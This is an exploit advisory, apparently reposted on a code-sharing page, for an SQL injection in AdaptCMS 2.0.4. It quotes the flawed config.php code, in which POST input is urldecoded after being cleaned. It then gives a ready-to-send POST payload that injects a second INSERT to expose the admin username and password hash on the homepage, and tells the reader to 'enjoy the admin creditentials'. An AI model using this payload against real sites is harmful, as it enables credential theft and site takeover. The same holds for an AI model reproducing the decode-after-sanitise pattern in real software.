扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
# Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability # Date: 26/10/2012 # Exploit Author: Kallimero # Vendor Homepage: http://www.adaptcms.com/ # Software Link: http://www.insanevisions.com/page/3/Downloads/ # Version: 2.0.4 # Tested on: Debian Introduction ============ As you know, I love fun and tricky SQL injections. AdaptCMS is vulnerable to a really unusual one. The vuln ======== First let's see the code : ---------------[config.php]--------------- Line 34 : array_map('clean', $_POST); ---------------[config.php]--------------- clean() acts like addslashes. But a couple of lines after: ---------------[config.php]--------------- ligne 111: mysql_query("INSERT INTO ".$pre."polls VALUES (null, '".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '', '".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')"); ---------------[config.php]--------------- w00t an SQL injection. $_POST['question'] is urldecoded after the superglobal's clean. That's why we can easily inject our SQL request. (Without ENT_QUOTES, the simple quote pass through htmlentities() ). The PoC : ========= Ok, now we have to add a second INSERT query, to insert a custom choice in the poll, which obviously contain the admin creditentials. A simple POST http request such as: article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648)-- - Now check homepage, and enjoy the admin creditentials. How to Fix ? ============ There is many SQL injections in this CMS ($_SERVER vars are vulnerables as well), and others funkies vulnz. changing your cms seems appropriate until they fix thoses issues. Thanks ========= All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. Please visit : http://www.orgasm.re/ |
体验盒子
